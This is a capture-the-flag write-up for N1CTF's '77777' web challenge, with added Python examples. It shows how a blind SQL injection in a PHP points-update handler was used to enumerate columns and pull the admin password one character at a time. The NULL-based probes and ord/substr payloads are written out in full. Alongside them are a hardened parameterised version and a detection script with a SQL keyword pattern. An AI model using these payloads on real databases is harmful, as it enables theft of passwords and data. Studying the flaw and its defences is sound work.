# ▼▼▼77777(Web:172/517=33.2%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
"77777" is my girlfriend's nickname,have fun xdd:)
hk node: http://47.75.14.48
cn node: http://47.97.168.223
(Two challenge servers are identical, use either of them.)

【Hints】
If you think you have got the flag and have trouble submitting the flag, please try again with lowercase letters in the flag and N1CTF{} wrapped.

For those who suffers from getting blocked, try http://47.97.168.223:23333 and http://47.75.14.48:23333 instead. We sincerely apologize for the inconvenience caused.
```

---

```
U can update my points in Profile.
And the flag is `admin's password`:)
```

---

The site's source code was published as an image on the site itself; transcribed, it reads:

```php
<?php
// Transcribed from the image on the challenge site.
function update_point($p, $points) {
    global $link;
    // %d casts $p to an integer, but %s splices $points into the SQL verbatim,
    // so everything after "points=<int>" is attacker-controlled. There is also
    // no WHERE clause: the UPDATE touches every row in users.
    $q = sprintf("UPDATE users SET points=%d%s",
                 $p, waf($points));
    if (!$query = mysqli_query($link, $q)) return FALSE;
    return TRUE;
}
if (!update_point($_POST['flag'], $_POST['hi']))
    echo 'sorry';
```

SQL injection is possible through `$points` (the `hi` parameter), but the input first passes through a WAF.
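To make the root cause concrete, here is an added example (mine, not kazkiti's code and not the challenge's code) that rebuilds the `sprintf("... points=%d%s")` pattern in Python against an in-memory SQLite table and places a hardened version next to it. SQLite stands in for MySQL, the `users` table and its single row are constructed, and the bitwise `|` probe from the writeup is the only payload used; the point is that the unsafe path lets the database evaluate the attacker's expression while the safe path rejects it before any SQL is built.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the challenge's users table (id, username, password, points)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, points INTEGER)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'placeholder-not-the-flag', 1)")
    conn.commit()
    return conn


def php_int(value):
    """Approximates PHP's %d coercion: leading integer digits, otherwise 0 (so 't' -> 0)."""
    m = re.match(r"\s*[+-]?\d+", str(value))
    return int(m.group()) if m else 0


def build_query_unsafe(p, points):
    """Mirror of sprintf("UPDATE users SET points=%d%s", $p, $points):
    %d neutralises $p, but %s pastes $points straight into the statement."""
    return "UPDATE users SET points=%d%s" % (php_int(p), points)


def update_points_unsafe(conn, p, points):
    """The vulnerable handler: whatever follows the integer is executed as SQL."""
    conn.execute(build_query_unsafe(p, points))
    conn.commit()


def update_points_safe(conn, user_id, points):
    """Hardened form: validate types in the application, bind values as parameters,
    and scope the UPDATE to one row. Returns True only if exactly one row changed."""
    try:
        user_id = int(user_id)
        points = int(points)          # "1|(select NULL)" raises ValueError here
    except (TypeError, ValueError):
        return False
    cur = conn.execute("UPDATE users SET points=? WHERE id=?", (points, user_id))
    conn.commit()
    return cur.rowcount == 1


def demo():
    # Unsafe path with the writeup's first probe, hi="|(select NULL)": the subquery is
    # evaluated by the database and points becomes NULL (for every row, no WHERE clause).
    conn = make_db()
    update_points_unsafe(conn, "1", "|(select NULL)")
    unsafe_points = conn.execute("SELECT points FROM users WHERE id=1").fetchone()[0]

    # Safe path with the same hostile value: rejected before any SQL exists, row untouched.
    conn = make_db()
    rejected = update_points_safe(conn, 1, "1|(select NULL)")
    untouched = conn.execute("SELECT points FROM users WHERE id=1").fetchone()[0]
    accepted = update_points_safe(conn, 1, "42")
    updated = conn.execute("SELECT points FROM users WHERE id=1").fetchone()[0]
    return unsafe_points, rejected, untouched, accepted, updated


if __name__ == "__main__":
    print(build_query_unsafe("1", "|(select NULL)"))
    print(demo())
```

The hardened version does not need a WAF at all: a `points` field is an integer, so anything that is not an integer is rejected outright, and the value that is accepted reaches the database as a bound parameter rather than as SQL text.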

---

When trying to tell a result of `1` from `0`, the value displayed in the response is not stable, because it is recalculated from the current seconds.

So a boolean-based blind injection that distinguishes `1` from `0` looks difficult.

---

`flag=1&hi=1|(select NULL)` ⇒ My Points: `NULL`

`flag=t&hi=0||(select case when 1 then NULL else 1 end)` ⇒ My Points: `NULL`

`flag=t&hi=0||(select case when 0 then NULL else 1 end)` ⇒ My Points: `1`

Blind SQL injection using NULL is possible.

---

**【Identify column names】**

`flag=t&hi=0||(select case when 0 then NULL else 1 end where ttttt like 1)` ⇒ My Points: `1`

`flag=t&hi=0||(select case when 0 then NULL else 1 end where id like 1)` ⇒ My Points: `NULL`

A column name can be referenced in the injected subquery, and the response differs depending on whether it exists (`ttttt` gives `1`, `id` gives `NULL`).

So the `id` column exists.

---

Doing the same for other candidate names:

The `username` column exists.

The `password` column exists.

In summary, the columns `id`, `username` and `password` exist.

---

**【Distinction between uppercase and lowercase letters】**

A plain string comparison under MySQL's default collation is case-insensitive, so we use `ord()` on each character to distinguish uppercase from lowercase letters:

`0*(select case when (ord(substr(password,1,1))>1) then NULL else 1 end)`

---

**【Confirm the number of rows】**

`flag=1&hi=1*(select case when (select id<2) then NULL else 1 end)` ⇒ My Points: `NULL`

`flag=1&hi=1*(select case when (select id>1) then NULL else 1 end)` ⇒ My Points: `11`

There appears to be only one row. With two or more rows the extraction would have been harder.

---

**【exploit】**

```
flag=1&hi=1*(select case when ord(substr(password,1,1))>104 then NULL else 1 end) 104 h
flag=1&hi=1*(select case when ord(substr(password,2,1))>101 then NULL else 1 end) 101 e
flag=1&hi=1*(select case when ord(substr(password,3,1))>108 then NULL else 1 end) 108 l
flag=1&hi=1*(select case when ord(substr(password,4,1))>108 then NULL else 1 end) 108 l
flag=1&hi=1*(select case when ord(substr(password,5,1))>111 then NULL else 1 end) 111 o
flag=1&hi=1*(select case when ord(substr(password,6,1))>99 then NULL else 1 end) 99 c
flag=1&hi=1*(select case when ord(substr(password,7,1))>116 then NULL else 1 end) 116 t
flag=1&hi=1*(select case when ord(substr(password,8,1))>102 then NULL else 1 end) 102 f
flag=1&hi=1*(select case when ord(substr(password,9,1))>101 then NULL else 1 end) 101 e
flag=1&hi=1*(select case when ord(substr(password,10,1))>114 then NULL else 1 end) 114 r
flag=1&hi=1*(select case when ord(substr(password,11,1))>50 then NULL else 1 end) 50 2
flag=1&hi=1*(select case when ord(substr(password,12,1))>51 then NULL else 1 end) 51 3
flag=1&hi=1*(select case when ord(substr(password,13,1))>51 then NULL else 1 end) 51 3
flag=1&hi=1*(select case when ord(substr(password,14,1))>51 then NULL else 1 end) 51 3
flag=1&hi=1*(select case when ord(substr(password,15,1))>51 then NULL else 1 end) 51 3
flag=1&hi=1*(select case when ord(substr(password,16,1))>20 then NULL else 1 end)
```

`N1CTF{helloctfer23333}`
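The extraction above needs a long series of requests, one comparison per character position, and the WAF's keyword filtering did not stop it. As an added example (mine, not from the writeup or the challenge), the following Python script shows the detection angle a defender would take on the application side: treat any non-integer `hi` value as a rejected request, and alert on a source that produces many rejected requests in a short window. The request records are constructed to resemble the writeup's payloads plus some benign traffic; the field names, IPs and timestamps are assumptions.

```python
import re
from collections import defaultdict

# Constructed request records (not real challenge logs): source IP, unix timestamp, and
# the POST fields the vulnerable handler reads (flag -> $p, hi -> $points).
SAMPLE_REQUESTS = [
    {"ip": "10.0.0.5", "ts": 1000 + i, "flag": "1",
     "hi": "1*(select case when ord(substr(password,%d,1))>%d then NULL else 1 end)"
           % (i // 7 + 1, 64 + i % 7)}
    for i in range(21)          # 21 oracle probes in 21 seconds, three characters' worth
] + [
    {"ip": "10.0.0.9", "ts": 1005, "flag": "1", "hi": "5"},      # benign
    {"ip": "10.0.0.9", "ts": 1010, "flag": "1", "hi": "-3"},     # benign
    {"ip": "10.0.0.7", "ts": 1020, "flag": "2", "hi": "12abc"},  # malformed, single request
]

# Only used to label the reason; the decision itself is "is it an integer or not".
SQL_EXPR = re.compile(r"\b(select|case|when|null|substr|ord)\b|[|*()]", re.IGNORECASE)


def classify_points(value):
    """Return None for a well-formed integer, otherwise a short reason string.
    Because of the %d/%s split in the handler, anything beyond digits in `hi`
    reaches the SQL engine verbatim, so a non-integer value is already an anomaly."""
    if re.fullmatch(r"\s*[+-]?\d+\s*", value):
        return None
    if SQL_EXPR.search(value):
        return "sql-expression"
    return "non-integer"


def detect_enumeration(records, threshold=10, window=60):
    """Return {ip: total_rejected} for every source that had at least `threshold`
    rejected `hi` values inside any `window`-second span. A character-by-character
    blind oracle needs many requests, so volume is the signal even when the
    individual payloads slip past a keyword filter."""
    by_ip = defaultdict(list)
    for r in sorted(records, key=lambda r: r["ts"]):
        if classify_points(r["hi"]) is not None:
            by_ip[r["ip"]].append(r["ts"])

    alerts = {}
    for ip, times in by_ip.items():
        start = 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = len(times)
                break
    return alerts


if __name__ == "__main__":
    for r in SAMPLE_REQUESTS[:2] + SAMPLE_REQUESTS[-3:]:
        print(r["ip"], repr(r["hi"][:40]), classify_points(r["hi"]))
    print(detect_enumeration(SAMPLE_REQUESTS))
```

The one-off `12abc` from `10.0.0.7` is logged but does not alert, while the probing source crosses the threshold on its tenth request; the threshold and window are tuning knobs, and the rejected requests themselves should of course never reach the database in the first place.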